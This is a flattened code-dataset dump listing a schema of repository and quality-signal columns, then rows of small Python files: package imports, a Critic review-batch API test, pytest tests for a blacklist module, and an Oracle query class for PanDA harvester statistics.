hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
df66ddefb0262a60a3c54dd4d3a557c00d7aec79
43
py
Python
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
137
2015-06-16T15:55:28.000Z
2022-03-26T06:01:59.000Z
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
381
2015-09-22T15:31:08.000Z
2022-02-14T09:05:23.000Z
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
30
2015-08-06T22:57:51.000Z
2022-03-02T20:30:20.000Z
from .base import * from .native import *
10.75
21
0.697674
6
43
5
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.209302
43
3
22
14.333333
0.882353
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
10dcbd44dbdd721c9efcef095faf26ea8b76efc2
354
py
Python
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
import random f = open('Numbes.txt','w') while True: number = str(random.randint(100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,999999999999999999999999999999999999999999999999999999999990000000000000000000000000000000000000000000000000000000000)) f.write(number)
39.333333
270
0.858757
18
354
16.888889
0.833333
0
0
0
0
0
0
0
0
0
0
0.722222
0.084746
354
8
271
44.25
0.216049
0
0
0
0
0
0.031884
0
0
1
0
0
0
1
0
false
0
0.2
0
0.2
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
804bdc206935b217a7d6507dcc849b56abe5bb0c
32
py
Python
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
1
2019-09-11T23:24:58.000Z
2019-09-11T23:24:58.000Z
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
null
null
null
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
5
2019-09-11T06:33:34.000Z
2020-02-17T12:52:31.000Z
print('Hello This is test info')
32
32
0.75
6
32
4
1
0
0
0
0
0
0
0
0
0
0
0
0.125
32
1
32
32
0.857143
0
0
0
0
0
0.69697
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
d510bf0c2d80c481b7973ca6b54f6b0c75a28588
13,852
py
Python
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
216
2015-01-05T12:48:10.000Z
2022-03-08T00:12:23.000Z
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
55
2015-02-28T12:10:26.000Z
2020-11-18T17:45:16.000Z
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
34
2015-05-02T15:15:10.000Z
2020-06-15T19:20:37.000Z
# @dependency 001-main/002-createrepository.py with repository.workcopy() as work: review = Review(work, "alice", "200-json/008-batches") review.addFile(first="200-json/008-batches/first.txt", second="200-json/008-batches/second.txt", third="200-json/008-batches/third.txt") review.commit("Reference commit", reference=True, first=["First", "=====", "Initial line"], second=["Second", "======", "Initial line"], third=["Third", "=====", "Initial line"]) review.commit("First commit", first=["First", "=====", "Initial line", "Added line"]) review.commit("Second commit", second=["Second", "======", "Initial line", "Added line"]) review.commit("Third commit", third=["Third", "=====", "Initial line", "Added line"]) review.addFilter("bob", "reviewer", "200-json/008-batches/") review.addFilter("dave", "reviewer", "200-json/008-batches/") review.submit() changesets = { "first": fetch_changeset({ "from": review.sha1s[0], "to": review.sha1s[1], }), "second": fetch_changeset({ "from": review.sha1s[1], "to": review.sha1s[2], }), "third": fetch_changeset({ "from": review.sha1s[2], "to": review.sha1s[3], }), "all": fetch_changeset({ "from": review.sha1s[0], "to": review.sha1s[3], }), } issues = { "alice": [], "bob": [], "dave": [] } changes = {} def fetch_changes(key): changes[key] = frontend.json( ("reviews/%d/changesets/%d/reviewablefilechanges" % (review.id, changesets[key]["id"])), expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets[key]["id"], "file": review.getFileId(key), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": None, }], })["reviewablefilechanges"] fetch_changes("first") fetch_changes("second") fetch_changes("third") with frontend.signin("alice"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft")) issues["alice"].append( 
frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Alice's issue #1", "location": { "type": "file-version", "changeset": changesets["first"]["id"], "side": "new", "file": review.getFilename("first"), "first_line": 1, "last_line": 4, } })["id"]) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft", created_comments=[issues["alice"][0]])) issues["alice"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Alice's issue #2", "location": { "type": "file-version", "changeset": changesets["second"]["id"], "side": "new", "file": review.getFilename("second"), "first_line": 1, "last_line": 2, } })["id"]) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft", created_comments=[issues["alice"][0], issues["alice"][1]])) frontend.json( "reviews/%d/batches" % review.id, post={}, expect=batch_json(review.id, "alice", "published", created_comments=[issues["alice"][0], issues["alice"][1]])) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft")) with frontend.signin("bob"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft")) issues["bob"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Bob's issue #1", "location": { "type": "file-version", "changeset": changesets["second"]["id"], "side": "new", "file": review.getFilename("second"), "first_line": 3, "last_line": 4, } })["id"]) frontend.json( "comments/%d" % issues["alice"][0], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][0], "state": "open", "draft_changes": draft_changes_json( "bob", new_state="resolved"), "*": "*", }) frontend.json( ("reviews/%d/changesets/%d/reviewablefilechanges" % (review.id, changesets["second"]["id"])), put={ 
"draft_changes": { "new_is_reviewed": True, } }, expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets["second"]["id"], "file": review.getFileId("second"), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("bob"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("bob"), }, }], }) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft", created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) with frontend.signin("dave"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft")) issues["dave"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Dave's issue #1", "location": { "type": "file-version", "changeset": changesets["all"]["id"], "side": "new", "file": review.getFilename("third"), "first_line": 1, "last_line": 4, } })["id"]) frontend.json( "comments/%d" % issues["alice"][0], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][0], "state": "open", "draft_changes": draft_changes_json( "dave", new_state="resolved"), "*": "*", }) frontend.json( "comments/%d" % issues["alice"][1], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][1], "state": "open", "draft_changes": draft_changes_json( "dave", new_state="resolved"), "*": "*", }) frontend.json( "reviewablefilechanges/%d,%d" % (changes["second"][0]["id"], changes["third"][0]["id"]), put={ "draft_changes": { "new_is_reviewed": True, } }, expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets["second"]["id"], "file": review.getFileId("second"), "deleted_lines": int, 
"inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("dave"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("dave"), }, }, { "id": int, "review": review.id, "changeset": changesets["third"]["id"], "file": review.getFileId("third"), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("dave"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("dave"), }, }], }) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft", created_comments=[issues["dave"][0]], resolved_issues=[issues["alice"][0], issues["alice"][1]], reviewed_changes=[changes["second"][0]["id"], changes["third"][0]["id"]])) with frontend.signin("bob"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft", created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) frontend.json( "reviews/%d/batches" % review.id, post={ "comment": "This looks good!", }, expect=batch_json(review.id, "bob", "published", comment=int, created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft")) with frontend.signin("dave"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft", created_comments=[issues["dave"][0]], resolved_issues=[issues["alice"][1]], reviewed_changes=[changes["third"][0]["id"]])) # eof
36.072917
77
0.380667
1,001
13,852
5.160839
0.100899
0.055749
0.06988
0.073558
0.84127
0.815718
0.755517
0.748161
0.734998
0.672474
0
0.013689
0.472639
13,852
383
78
36.167102
0.693498
0.003465
0
0.698864
0
0
0.20071
0.024346
0
0
0
0
0
1
0.002841
false
0
0
0
0.002841
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1d8844409374c25ed07d2fd0a2fbef5e5063ca28
40
py
Python
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
1
2020-09-25T13:54:15.000Z
2020-09-25T13:54:15.000Z
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
null
null
null
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
1
2020-09-13T08:06:51.000Z
2020-09-13T08:06:51.000Z
from .cpu_adam import DeepSpeedCPUAdam
20
39
0.85
5
40
6.6
1
0
0
0
0
0
0
0
0
0
0
0
0.125
40
1
40
40
0.942857
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d53eaa9827ac3d5897b7fdf373ebf9a80e6e4416
1,816
py
Python
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
null
null
null
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
7
2020-03-24T17:54:31.000Z
2021-09-21T12:34:34.000Z
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
null
null
null
import pytest from . import db from .db import database from tagtrain import data def test_unknown_user(database): with pytest.raises(data.Group.DoesNotExist): data.by_owner.unblacklist_user('non-existent', 'doesnt-matter', db.GROUP_NAME) def test_unknown_group(database): with pytest.raises(data.Group.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'doesnt-matter', 'non-existent') def test_unknown_blanket_blacklist(database): with pytest.raises(data.Blacklist.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'non-existent') def test_unknown_group_blacklist(database): with pytest.raises(data.Blacklist.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'non-existent', db.GROUP_NAME) def test_good_blanket(database): OWNER_NAME = 'user2' MEMBER_NAME = 'blockee' bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 1 bl = data.by_owner.unblacklist_user(OWNER_NAME, MEMBER_NAME) assert bl.owner_reddit_name == OWNER_NAME assert bl.blocked_reddit_name == MEMBER_NAME assert bl.group is None bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 0 def test_good_group(database): OWNER_NAME = db.OWNER_NAME GROUP_NAME = db.GROUP_NAME MEMBER_NAME = 'blockee' bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 2 bl = data.by_owner.unblacklist_user(OWNER_NAME, MEMBER_NAME, GROUP_NAME) assert bl.owner_reddit_name == OWNER_NAME assert bl.blocked_reddit_name == MEMBER_NAME assert bl.group is not None assert bl.group.name == db.GROUP_NAME bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 1
30.266667
86
0.742291
263
1,816
4.851711
0.1673
0.098746
0.086207
0.109718
0.80721
0.717085
0.717085
0.717085
0.717085
0.708464
0
0.003266
0.156938
1,816
59
87
30.779661
0.830176
0
0
0.4
0
0
0.051211
0
0
0
0
0
0.275
1
0.15
false
0
0.1
0
0.25
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
d598314ea9d76bb701fcce1812203ee46b871a0b
3,390
py
Python
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
null
null
null
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
null
null
null
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
1
2019-02-20T17:36:48.000Z
2019-02-20T17:36:48.000Z
import json from logger import ServiceLogger from baseclasses.oracledbbaseclass import OracleDbBaseClass _logger = ServiceLogger("pq_pandadb", __file__).logger class PandaDBPQ(OracleDbBaseClass): def __init__(self, path): super().__init__(path) def get_running_workers_jobs(self): try: connection = self.connection computingsite_stat = {} query = """ SELECT computingsite, count(status) as nworkers, count(jobstatus) as njobs FROM (SELECT ww.computingsite as computingsite, ww.status as status, ww.lastupdate as wlastupdate, ww.starttime as wstarttime, jj.pandaid, jj.LASTUPDATE as pidlastupdate, ja.jobstatus, ja.computingsite as jobcomputingsite FROM ATLAS_PANDA.harvester_workers ww LEFT OUTER JOIN atlas_panda.harvester_rel_jobs_workers jj ON ww.harvesterid = jj.harvesterid and ww.workerid = jj.workerid LEFT OUTER JOIN atlas_panda.jobsactive4 ja ON jj.pandaid = ja.pandaid ) WHERE status = 'running' and wlastupdate >= CAST (sys_extract_utc(SYSTIMESTAMP) - interval '10' minute as DATE) GROUP BY computingsite """ results = self.__read_query(query, connection) for result in results: computingsite_stat[result['computingsite']] = {'nworkers':result['nworkers'], 'njobs':result['njobs']} except: pass return computingsite_stat def get_running_workers_completed_jobs(self): try: connection = self.connection computingsite_stat = {} query = """ SELECT computingsite, count(status) as nworkers, count(jobstatus) as njobs FROM (SELECT ww.computingsite as computingsite, ww.status as status, ww.lastupdate as wlastupdate, ww.starttime as wstarttime, jj.pandaid, jj.LASTUPDATE as pidlastupdate, ja.jobstatus, ja.computingsite as jobcomputingsite FROM ATLAS_PANDA.harvester_workers ww LEFT OUTER JOIN atlas_panda.harvester_rel_jobs_workers jj ON ww.harvesterid = jj.harvesterid and ww.workerid = jj.workerid LEFT OUTER JOIN atlas_panda.jobsarchived4 ja ON jj.pandaid = ja.pandaid) WHERE status = 'running' and wlastupdate >= CAST (sys_extract_utc(SYSTIMESTAMP) - interval '10' minute as DATE) GROUP BY 
computingsite """ results = self.__read_query(query, connection) for result in results: computingsite_stat[result['computingsite']] = {'nworkers':result['nworkers'], 'njobs':result['njobs']} except: pass return computingsite_stat # private method def __read_query(self, query, connection): cursor = connection.cursor() try: cursor.execute(query) return self.__rows_to_dict_list(cursor) finally: if cursor is not None: cursor.close() # private method def __rows_to_dict_list(self, cursor): columns = [str(i[0]).lower() for i in cursor.description] return [dict(zip(columns, row)) for row in cursor]
36.451613
134
0.613274
354
3,390
5.69209
0.279661
0.05062
0.037717
0.035732
0.735484
0.735484
0.735484
0.735484
0.735484
0.735484
0
0.003002
0.312094
3,390
92
135
36.847826
0.861063
0.008555
0
0.716216
0
0.054054
0.549434
0.072067
0
0
0
0
0
1
0.067568
false
0.027027
0.040541
0
0.175676
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
6340a6f2358fdb957ebfd45cb5a7ac10c3782961
93
py
Python
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
2,209
2016-11-20T10:32:58.000Z
2022-03-31T20:51:27.000Z
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
1,074
2016-12-07T05:02:48.000Z
2022-03-22T02:09:11.000Z
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
147
2016-12-11T04:13:28.000Z
2022-03-27T14:50:00.000Z
#!/usr/bin/env python2 from __future__ import print_function import sys print(sys.argv[1:])
15.5
37
0.774194
15
93
4.466667
0.8
0
0
0
0
0
0
0
0
0
0
0.024096
0.107527
93
5
38
18.6
0.783133
0.225806
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0.666667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
6
634d414f3ba9ef3b9d6ff170297e0f5c715feae7
467
py
Python
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
1
2021-11-07T00:30:05.000Z
2021-11-07T00:30:05.000Z
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
null
null
null
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
null
null
null
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from .task import * from .vlmtask import * from .retritask import * try: from .fairseqmmtask import * except ImportError: pass try: from .milncetask import * except ImportError: pass try: from .expretritask import * except ImportError: pass
20.304348
66
0.687366
59
467
5.440678
0.59322
0.065421
0.214953
0.252336
0.211838
0.211838
0
0
0
0
0
0
0.252677
467
22
67
21.227273
0.919771
0.359743
0
0.6
0
0
0
0
0
0
0
0
0
1
0
true
0.2
0.6
0
0.6
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
6368c6ff6119a625f388c77f74148a947cac98b0
18
py
Python
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
87
2015-01-03T13:57:31.000Z
2022-01-18T14:56:23.000Z
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
1
2015-09-13T15:45:54.000Z
2015-09-13T15:45:54.000Z
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
124
2015-01-15T22:05:39.000Z
2022-03-20T18:35:57.000Z
print(u'\xA9')
3.6
14
0.5
3
18
3
1
0
0
0
0
0
0
0
0
0
0
0.071429
0.222222
18
4
15
4.5
0.571429
0
0
0
0
0
0.266667
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
892f1458e31c73522fc2b21e5aa86b619e94a5a0
147
py
Python
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
null
null
null
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
113
2021-02-15T19:22:36.000Z
2021-05-07T15:17:42.000Z
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
null
null
null
from .build_option import * from .core import * from .installed_instance import * from .reqs import * from .supported_installed_instances import *
24.5
44
0.795918
19
147
5.947368
0.526316
0.353982
0
0
0
0
0
0
0
0
0
0
0.136054
147
5
45
29.4
0.889764
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
897d3eb7061aee4346e0741682d29323f39bf029
64
py
Python
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
from .audio_loader import * from .data_loader import DataLoader
21.333333
35
0.828125
9
64
5.666667
0.666667
0.470588
0
0
0
0
0
0
0
0
0
0
0.125
64
2
36
32
0.910714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
89814eb0b15b01d17501db843cacd5a5770379fd
23,563
py
Python
gs_quant/timeseries/measures_rates.py
alexanu/gs-quant
fbb8d88d570aee545ed3a8601d9052c281ecca19
[ "Apache-2.0" ]
1
2020-05-18T02:09:39.000Z
2020-05-18T02:09:39.000Z
gs_quant/timeseries/measures_rates.py
atefar2/gs-quant
d31ae3204d5421861897bac49383bc213d5497a2
[ "Apache-2.0" ]
null
null
null
gs_quant/timeseries/measures_rates.py
atefar2/gs-quant
d31ae3204d5421861897bac49383bc213d5497a2
[ "Apache-2.0" ]
null
null
null
